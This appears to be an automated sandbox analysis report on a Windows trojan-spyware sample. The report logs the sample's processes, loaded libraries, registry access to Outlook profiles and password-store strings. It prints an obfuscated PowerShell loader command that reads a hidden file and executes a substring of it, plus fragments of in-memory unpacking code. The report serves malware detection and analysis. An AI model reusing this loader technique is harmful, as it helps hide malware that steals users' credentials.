Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BA090	5_2_219BA090
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BD290	5_2_219BD290
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B0E8A	5_2_219B0E8A
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BBCB0	5_2_219BBCB0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B8AB0	5_2_219B8AB0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BEEB0	5_2_219BEEB0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BD8D0	5_2_219BD8D0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BA6D0	5_2_219BA6D0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B04FA	5_2_219B04FA
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BF4F0	5_2_219BF4F0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B90F0	5_2_219B90F0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BC2F0	5_2_219BC2F0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B1CE0	5_2_219B1CE0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B0012	5_2_219B0012
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BC610	5_2_219BC610
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B9410	5_2_219B9410
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BF810	5_2_219BF810
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B1817	5_2_219B1817
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BB030	5_2_219BB030
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BE230	5_2_219BE230
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B1828	5_2_219B1828
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B9A50	5_2_219B9A50
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BCC50	5_2_219BCC50
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219B0040	5_2_219B0040
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BE870	5_2_219BE870
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_219BB670	5_2_219BB670
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B32238	5_2_21B32238
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B32920	5_2_21B32920
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B30D88	5_2_21B30D88
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B33008	5_2_21B33008
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B31470	5_2_21B31470
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B336F0	5_2_21B336F0
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B31B50	5_2_21B31B50
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B30012	5_2_21B30012
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B30040	5_2_21B30040
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B32227	5_2_21B32227
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B309EA	5_2_21B309EA
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B32911	5_2_21B32911
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B30A10	5_2_21B30A10
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B30D78	5_2_21B30D78
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B32FF8	5_2_21B32FF8
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B31466	5_2_21B31466
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B336E1	5_2_21B336E1
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21B31B41	5_2_21B31B41
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21C2392F	5_2_21C2392F
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21C2323D	5_2_21C2323D
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21C29130	5_2_21C29130
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21C21A20	5_2_21C21A20

Source: TjoY7n65om.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/13@5/5

Source: C:\Users\user\Desktop\TjoY7n65om.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00403359 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,		5_2_00403359

Source: C:\Users\user\Desktop\TjoY7n65om.exe

Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046EC

Source: C:\Users\user\Desktop\TjoY7n65om.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\TjoY7n65om.exe

File created: C:\Users\user\AppData\Roaming\luminances

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03

Source: C:\Users\user\Desktop\TjoY7n65om.exe

File created: C:\Users\user\AppData\Local\Temp\nsx68DF.tmp

Jump to behavior

Source: TjoY7n65om.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\TjoY7n65om.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TjoY7n65om.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E970000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TjoY7n65om.exe	ReversingLabs: Detection: 50%
Source: TjoY7n65om.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\TjoY7n65om.exe

File read: C:\Users\user\Desktop\TjoY7n65om.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TjoY7n65om.exe "C:\Users\user\Desktop\TjoY7n65om.exe"
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Bivejens.exe "C:\Users\user\AppData\Local\Temp\Bivejens.exe"
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Bivejens.exe "C:\Users\user\AppData\Local\Temp\Bivejens.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\TjoY7n65om.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: TjoY7n65om.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Troldmandsorganisationerne $Lvetmmer $Systemskitserne), (Allokeret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:polybuttoned = [AppDomain]::CurrentDomai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Decompoundly55)), $Trblseres).DefineDynamicModule($Blaastjerners, $false).DefineType($Blgepappen, $Containerne, [System.MulticastDeleg

Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_3_0019CA98 pushfd ; retf 0019h	5_3_0019CA99
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_3_0019CF4C push eax; iretd	5_3_0019CF4D
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_3_0019EEA8 push eax; iretd	5_3_0019EEA9
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_3_0019EE60 push eax; iretd	5_3_0019EE65
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_00159C30 push esp; retf 0017h	5_2_00159D55
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015B4C7 push dword ptr [ebp+ecx-75h]; retf	5_2_0015B4D2
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015B539 push dword ptr [ebp+ebx-75h]; iretd	5_2_0015B53D
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_0015891E pushad ; iretd	5_2_0015891F
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_016F49AA push ecx; iretd	5_2_016F49AD
Source: C:\Users\user\AppData\Local\Temp\Bivejens.exe	Code function: 5_2_21C236A6 push es; retf	5_2_21C236A7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Bivejens.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\TjoY7n65om.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TjoY7n65om.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
